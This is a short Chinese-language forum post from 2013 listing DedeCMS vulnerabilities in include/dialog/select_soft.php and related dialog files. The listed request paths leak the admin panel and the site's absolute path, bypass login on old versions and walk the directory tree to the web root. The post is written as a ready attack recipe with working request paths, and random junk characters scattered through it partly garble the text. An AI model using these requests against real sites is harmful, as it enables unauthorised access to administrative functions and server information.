1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理, h* ~3 m" x. a; u% m9 T, D
- }! n" l; \- W) R
员帐号,新版本的就直接转向了后台.4 V# z; ]: k _% X* |6 {
1 \* i$ p2 H4 Y
2.include/dialog/config.php会爆出后台管理路径
6 K" ~. L* h+ M; N. K9 l' p: @+ }- N& z& a
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
# u8 B" { o4 N/ ^$ g8 m: Q; s0 _5 P
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
( f$ G7 j. E( J5 Z! k; q6 _1 S& Z% h
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
# G: R) K) W5 f, U0 I
1 ^( p5 ]' X" `到根目录去.不过这些版本的访问地址有些不同.
: g! ]; A3 ?, R2 G* L地址为require/dialog/select_soft.php?activepath=/././././././././
) C$ s8 N2 X: w1 h% _& q
8 ?0 e7 ]4 Q; x Q/ jinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..* G$ e4 Z4 _# d+ H* T, x7 T- T/ e6 A# @
存在相同问题的文件还有$ y/ P5 ]" l& p1 b
include\dialog\select_images.php7 d7 h* C( q9 D! ]* T' j8 Y& V6 F
include\dialog\select_media.php5 r2 A0 o1 C# H: ^% ?
include\dialog\select_templets.php
- Z G& p+ P5 {2 B1 T* M5 t3 u4 m& ?8 x |
发表于 2013-4-16 16:50:43
收藏
支持
反对